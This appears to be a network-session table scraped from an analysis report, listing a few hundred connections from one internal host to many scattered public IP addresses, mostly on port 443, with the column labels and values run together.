                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17669192.168.2.1333160183.6.222.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17670192.168.2.135667417.40.188.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17671192.168.2.1351388111.170.195.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17672192.168.2.1340472196.128.3.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17673192.168.2.1356506167.194.251.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17674192.168.2.1355528115.206.153.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17675192.168.2.134050885.3.146.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17676192.168.2.1350950196.86.34.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17677192.168.2.1360976136.106.56.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17678192.168.2.135506031.92.122.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17679192.168.2.1336492155.154.83.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17680192.168.2.134351618.77.78.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17681192.168.2.1333506107.204.121.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17682192.168.2.13391601.129.144.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17683192.168.2.1355120106.189.56.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17684192.168.2.134342014.121.166.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17685192.168.2.135416688.143.49.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17686192.168.2.133766466.56.132.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17687192.168.2.134049062.146.165.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17688192.168.2.135884098.93.96.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17689192.168.2.1339028180.20.129.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17690192.168.2.13541384.195.51.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17691192.168.2.1339840128.222.36.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17692192.168.2.134284671.58.33.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17693192.168.2.135959080.238.219.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17694192.168.2.1334902155.59.11.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17695192.168.2.1335282110.98.76.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17696192.168.2.1357994190.133.26.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17697192.168.2.1338518148.152.229.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17698192.168.2.1342686104.155.235.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17699192.168.2.134590225.66.38.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17700192.168.2.1333100141.145.164.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17701192.168.2.134489638.119.247.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17702192.168.2.133448844.168.120.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17703192.168.2.1339510124.135.202.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17704192.168.2.135116472.84.151.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17705192.168.2.133882884.11.130.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17706192.168.2.1332888199.114.80.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17707192.168.2.1356864203.11.249.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17708192.168.2.135440651.162.221.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17709192.168.2.134603083.170.193.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17710192.168.2.134531877.40.50.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17711192.168.2.1342116184.66.227.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17712192.168.2.133362067.91.43.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17713192.168.2.134122239.242.1.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17714192.168.2.135507646.89.191.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17715192.168.2.1346950144.4.122.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17716192.168.2.1352098205.0.75.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17717192.168.2.1354564131.16.90.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17718192.168.2.1355646120.103.210.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17719192.168.2.1354980144.188.59.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17720192.168.2.136021676.197.36.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17721192.168.2.1340454148.123.2.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17722192.168.2.134124289.72.253.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17723192.168.2.1352340148.122.198.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17724192.168.2.13587005.150.133.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17725192.168.2.1334952197.39.237.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17726192.168.2.133304851.249.20.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17727192.168.2.1340760120.55.124.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17728192.168.2.1333574147.27.180.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17729192.168.2.133670620.185.251.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17730192.168.2.1360140146.134.188.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17731192.168.2.1337402158.254.159.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17732192.168.2.1334024120.155.47.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17733192.168.2.134693224.115.234.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17734192.168.2.133511036.144.240.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17735192.168.2.135226687.85.143.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17736192.168.2.1350482172.132.113.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17737192.168.2.1360932207.16.190.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17738192.168.2.134890272.241.121.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17739192.168.2.133625471.62.78.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17740192.168.2.13530488.222.140.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17741192.168.2.1341588220.209.80.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17742192.168.2.1353944208.60.51.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17743192.168.2.135343827.223.156.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17744192.168.2.1360616150.127.183.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17745192.168.2.1338144166.31.4.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17746192.168.2.134708097.247.175.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17747192.168.2.135211098.8.11.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17748192.168.2.1357436219.71.99.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17749192.168.2.1343596203.94.248.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17750192.168.2.1337012117.107.99.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17751192.168.2.1358952190.204.121.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17752192.168.2.135218619.190.37.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17753192.168.2.135139832.170.148.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17754192.168.2.1357554111.129.89.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17755192.168.2.1347408119.71.142.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17756192.168.2.133593048.153.132.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17757192.168.2.134917263.154.107.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17758192.168.2.1351648177.35.35.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17759192.168.2.133619875.178.201.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17760192.168.2.1336958221.219.158.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17761192.168.2.1341542104.165.13.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17762192.168.2.1358192143.130.128.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17763192.168.2.1344556204.253.116.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17764192.168.2.1337646174.157.124.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17765192.168.2.134864474.170.144.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17766192.168.2.1344746198.232.77.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17767192.168.2.133920675.120.199.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17768192.168.2.133995091.12.164.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17769192.168.2.1347584101.157.229.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17770192.168.2.1354562212.155.54.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17771192.168.2.1341134163.11.182.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17772192.168.2.133904494.122.155.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17773192.168.2.1335160149.117.154.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17774192.168.2.1347566184.65.246.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17775192.168.2.1356794134.179.210.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17776192.168.2.1343478164.195.102.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17777192.168.2.1340746185.253.156.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17778192.168.2.1357236109.250.124.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17779192.168.2.1339366124.135.54.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17780192.168.2.133875878.221.110.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17781192.168.2.133916457.36.80.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17782192.168.2.134509089.152.110.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17783192.168.2.1344882112.71.69.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17784192.168.2.1358550116.184.88.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17785192.168.2.134939288.244.84.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17786192.168.2.134297664.165.173.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17787192.168.2.1348026194.232.175.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17788192.168.2.1346904115.238.192.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17789192.168.2.134055247.43.9.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17790192.168.2.1357262126.81.121.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17791192.168.2.1359004143.159.33.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17792192.168.2.135912874.87.4.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17793192.168.2.135094653.191.243.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17794192.168.2.1354774221.115.96.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17795192.168.2.133601660.108.156.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17796192.168.2.134301067.114.34.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17797192.168.2.1359728195.103.146.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17798192.168.2.1344808122.249.105.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17799192.168.2.1355658144.96.41.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17800192.168.2.1349282196.228.117.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17801192.168.2.136091427.40.79.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17802192.168.2.135302240.174.234.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17803192.168.2.135736673.68.134.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17804192.168.2.1343702180.9.225.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17805192.168.2.1335918194.33.137.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17806192.168.2.1334264206.199.39.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17807192.168.2.1343398131.76.157.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17808192.168.2.1346216158.110.175.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17809192.168.2.134390039.194.136.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17810192.168.2.134328453.161.84.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17811192.168.2.133704688.237.173.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17812192.168.2.1337224204.244.128.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17813192.168.2.1345722193.73.85.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17814192.168.2.134743838.50.72.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17815192.168.2.1340898120.163.105.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17816192.168.2.1360682212.25.18.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17817192.168.2.1344254213.132.133.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17818192.168.2.1343996190.246.114.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17819192.168.2.1336484103.10.219.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17820192.168.2.133941861.25.112.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17821192.168.2.1347474159.94.70.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17822192.168.2.1352456140.194.24.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17823192.168.2.135874263.41.121.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17824192.168.2.1352282109.199.26.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17825192.168.2.1360042173.242.59.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17826192.168.2.133833232.172.183.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17827192.168.2.135681092.44.214.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17828192.168.2.1338834209.219.111.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17829192.168.2.135458470.6.50.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17830192.168.2.135648081.37.115.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17831192.168.2.136075880.206.255.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17832192.168.2.1337686181.26.71.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17833192.168.2.134001817.244.62.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17834192.168.2.1333308102.158.186.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17835192.168.2.1346476125.39.51.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17836192.168.2.13496005.180.128.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17837192.168.2.134465077.218.18.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17838192.168.2.1358110155.244.204.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17839192.168.2.1335118154.194.137.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17840192.168.2.135894241.180.35.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17841192.168.2.1343376128.41.255.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17842192.168.2.133582276.28.155.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17843192.168.2.1339724177.145.105.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17844192.168.2.1356816161.126.63.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17845192.168.2.136043249.167.81.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17846192.168.2.135436851.106.73.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17847192.168.2.133685683.21.53.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17848192.168.2.135997025.203.65.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17849192.168.2.1343416162.186.45.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17850192.168.2.134344268.47.97.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17851192.168.2.1343250101.104.39.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17852192.168.2.134712491.54.102.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17853192.168.2.133490251.81.90.2558080
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17854192.168.2.13586082.193.38.1368080
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17855192.168.2.134506869.237.205.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17856192.168.2.1340756201.11.33.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17857192.168.2.1358924121.14.11.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17858192.168.2.1347896132.33.213.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17859192.168.2.134986461.147.2.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17860192.168.2.1352084147.29.35.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17861192.168.2.134066247.143.11.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17862192.168.2.1337022209.172.233.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17863192.168.2.1335478187.5.206.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17864192.168.2.134447234.89.70.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17865192.168.2.135272457.97.252.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17866192.168.2.1343940175.165.12.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17867192.168.2.1338284220.196.228.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17868192.168.2.1338828202.29.71.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17869192.168.2.134194081.129.43.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17870192.168.2.1340120165.161.85.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17871192.168.2.133439698.95.210.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17872192.168.2.1345018178.155.7.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17873192.168.2.133649880.242.224.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17874192.168.2.135231897.9.216.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17875192.168.2.135957046.155.148.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17876192.168.2.133781451.134.113.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17877192.168.2.135197051.57.14.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17878192.168.2.135781639.46.133.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17879192.168.2.135795265.81.72.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17880192.168.2.1346886176.143.15.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17881192.168.2.133752890.19.241.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17882192.168.2.1350500105.160.44.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17883192.168.2.13418284.104.148.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17884192.168.2.1341082128.66.21.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17885192.168.2.1356968112.218.148.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17886192.168.2.1337556184.117.65.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17887192.168.2.1337172185.103.86.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17888192.168.2.133946420.72.31.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17889192.168.2.135443037.144.116.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17890192.168.2.1346792186.30.126.103443
